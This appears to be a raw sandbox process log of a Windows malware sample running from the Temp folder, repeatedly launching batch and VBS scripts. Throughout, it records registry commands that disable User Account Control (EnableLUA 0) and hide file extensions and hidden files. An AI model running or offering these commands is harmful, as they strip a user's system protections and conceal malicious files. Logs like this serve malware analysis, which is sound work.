C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TsoQckQw.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YIMkocsE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GUUAoQcw.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AOYUgosE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UeMYccks.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rwscksoM.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xUcwQswA.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZoYAkMss.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ngUIQYko.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IMwsscow.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MggIoMIM.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cGgUkckI.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xYokoEAI.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fWUwosks.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MGIQEIcE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yywUccEs.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kkkkcEMk.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\meQYMIMw.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DuEwsgUw.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nIAsYosU.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TGYMEwsE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
